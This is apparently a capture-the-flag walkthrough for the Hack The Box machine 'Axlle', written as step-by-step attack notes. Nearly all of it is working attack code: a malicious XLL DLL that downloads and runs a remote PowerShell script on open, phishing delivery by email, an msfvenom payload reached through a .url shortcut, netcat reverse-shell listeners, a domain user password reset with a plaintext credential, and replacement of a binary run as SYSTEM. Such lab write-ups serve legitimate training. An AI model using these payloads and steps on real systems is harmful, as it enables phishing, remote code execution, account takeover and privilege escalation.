Axlle HTB
by kpax
- Initial Access - gideon.hamill
- Lateral Movement to dallon.matrix
- Shell as dallon.matrix
- Shell as jacob.greeny
Initial Access - gideon.hamill
Create a DLL and compile for windows, naming it xll (xlls are dlls that run under excel)
include <windows.h>
#include <stdlib.h>
BOOL WINAPI
DllMain( HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch(dwReason)
{
case DLL_PROCESS_ATTACH:
break;
}
return TRUE;
}
__declspec(dllexport) int WINAPI xlAutoOpen(void)
{
system("cmd.exe /c powershell IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2:8000/conpty.ps1')");
}
Compile
x86_64-w64-mingw32-gcc invoice.c -o invoice.xll -shared
Listen for conpty shell
stty raw -echo; (stty size; cat) | nc -lvnp 9001
Send with SWAKS
swaks -t accounts@axlle.htb -f me@test.com --attach invoice.xll -p 25 --header "Subject: invoice" --body "OpenMe" -s 10.129.231.60
Create a new PS-Drive for easy copying of files
new-psdrive -name "myfiles" -psprovider "filesystem" -root "\\10.10.14.2\test"
Lateral Movement to dallon.matrix
Find email here C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml
Create an msfvenom executable to phish with
msfvenom -a x64 --platform Windows -p windows/x64/exec CMD="cmd.exe /c powershell IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2:8000/conpty.ps1')" -f exe -o evil.exe
Create a file called shortcut.url with the following contents
[InternetShortcut]
URL=file:////10.10.14.2/test/evil.exe
Listen for conpty shell
stty raw -echo; (stty size; cat) | nc -lvnp 9001
Copy shortcut.url to c:\inetpub\testing
curl http://10.10.14.2:8000/shortcut.url -o shortcut.url
Shell as dallon.matrix
Create a new PS-Drive for easy copying of files
new-psdrive -name "myfiles" -psprovider "filesystem" -root "\\10.10.14.2\test"
Copy PowerView.ps1 and load it in
copy myfiles:PowerView.ps1 .
. .\PowerView.ps1
Change jacob.greeny password
$SecPassword = ConvertTo-SecureString 'PJsO1du$CVJ#D' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('axlle.htb\dallon.matrix', $SecPassword)
$UserPassword = ConvertTo-SecureString 'P@ssword123' -AsPlainText -Force
Set-DomainUserPassword -Identity jacob.greeny -AccountPassword $UserPassword -Credential $Cred
Create PS Session as user
$SecPassword = ConvertTo-SecureString 'P@ssword123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('axlle.htb\jacob.greeny', $SecPassword)
$session = New-PSSession -ComputerName MAINFRAME.AXLLE.HTB -Credential $Cred
Invoke-Command -Session $session -ScriptBlock {IEX ((new-object net.webclient).downloadstring('http://10.10.14.2:8000/conpty.ps1'))}
Shell as jacob.greeny
Create a new PS-Drive for easy copying of files
new-psdrive -name "myfiles" -psprovider "filesystem" -root "\\10.10.14.2\test"
Overwrite standalone.exe that is run as system according to [[50 - loot#Keyboard Translation Readme.md]]
cd "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64"
copy myfiles:evil.exe .\standalonerunner.exe